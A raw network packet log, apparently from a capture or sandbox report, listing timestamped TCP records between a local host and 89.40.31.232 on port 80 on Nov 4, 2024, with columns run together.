                                                              Nov 4, 2024 09:27:57.003715992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003730059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003748894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003776073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003781080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003793955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003806114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003817081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003818989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003824949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003838062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003838062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003860950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003890038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003952980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003964901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003985882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.003994942 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.003998995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004009962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004012108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004024982 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004031897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004044056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004054070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004057884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004072905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004085064 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004085064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004106998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004127026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004172087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004184008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004198074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004220009 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004255056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004290104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004302979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004313946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004323959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004332066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004338026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004352093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004357100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004370928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004381895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004388094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004400969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004400969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004429102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004446983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004458904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004458904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004472971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004487991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004502058 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004518986 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004523039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004537106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004548073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004559040 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004561901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004578114 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004601002 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004642010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004657030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004671097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004682064 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004686117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004703045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004719019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004729033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004762888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004782915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004795074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004808903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004821062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004826069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004853964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004878044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004925966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004944086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004956007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004966021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004975080 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004980087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.004987955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.004993916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005003929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005016088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005028009 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005037069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.005042076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005044937 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.005075932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.005095959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.005109072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005120039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.005186081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.050841093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.050892115 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.050910950 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.050959110 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.094172955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.094198942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.094213963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.094336987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.094336987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119242907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119257927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119270086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119297028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119323015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119327068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119368076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119381905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119394064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119405985 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119419098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119426012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119441032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119446993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119468927 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119494915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119517088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119555950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119563103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119569063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119599104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119607925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119615078 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119621038 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119652987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119663954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119672060 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119677067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119688988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119709969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119738102 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119761944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119772911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119811058 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119818926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119831085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119843006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119854927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119860888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119889021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119915009 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.119952917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119966984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119978905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.119992018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120003939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120006084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120064974 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120064974 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120090008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120100021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120114088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120132923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120135069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120146036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120157003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120167017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120182991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120187998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120201111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120201111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120233059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120253086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120297909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120310068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120321989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120335102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120346069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120349884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120376110 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120393038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120421886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120431900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120441914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120452881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120462894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120496035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120515108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120527029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120538950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120552063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120556116 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120584011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120610952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120630980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120642900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120652914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120666981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120675087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120695114 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120728970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120743990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120757103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120770931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120789051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120816946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120878935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120888948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120898962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120912075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120922089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120928049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120934963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120948076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120959997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.120961905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120975018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.120990038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121027946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121063948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121109962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121150017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121180058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121187925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121191025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121202946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121216059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121225119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121228933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121243954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121256113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121256113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121273041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121298075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121309996 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121345043 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121428967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121442080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121454954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121465921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121468067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121480942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121485949 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121494055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121500969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121511936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121512890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121541023 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121572971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121596098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121654034 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121726990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121737957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121747971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121762037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121773958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121774912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121786118 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121799946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121803999 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121814966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121825933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121836901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121840000 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.121859074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121876955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.121903896 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122059107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122071981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122082949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122096062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122107983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122112036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122119904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122128010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122131109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122144938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122154951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122162104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122168064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122179985 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122189045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122191906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122208118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122209072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122242928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122272015 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122306108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122318029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122329950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122340918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122348070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122354984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122371912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122401953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.122416019 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.122452974 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.166357994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.166379929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.166393995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.166419029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.166438103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.229532957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.229553938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.229579926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.229648113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.229691029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236335993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236349106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236362934 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236406088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236406088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236421108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236433983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236444950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236458063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236459970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236483097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236494064 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236527920 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236855984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236896038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236902952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236915112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.236941099 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.236958027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237000942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237014055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237026930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237039089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237049103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237060070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237072945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237075090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237090111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237116098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237171888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237184048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237198114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237211943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237215042 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237226009 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237237930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237241030 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237273932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237307072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237318993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:57.237328053 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237348080 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:57.237361908 CET4993280192.168.2.789.40.31.232
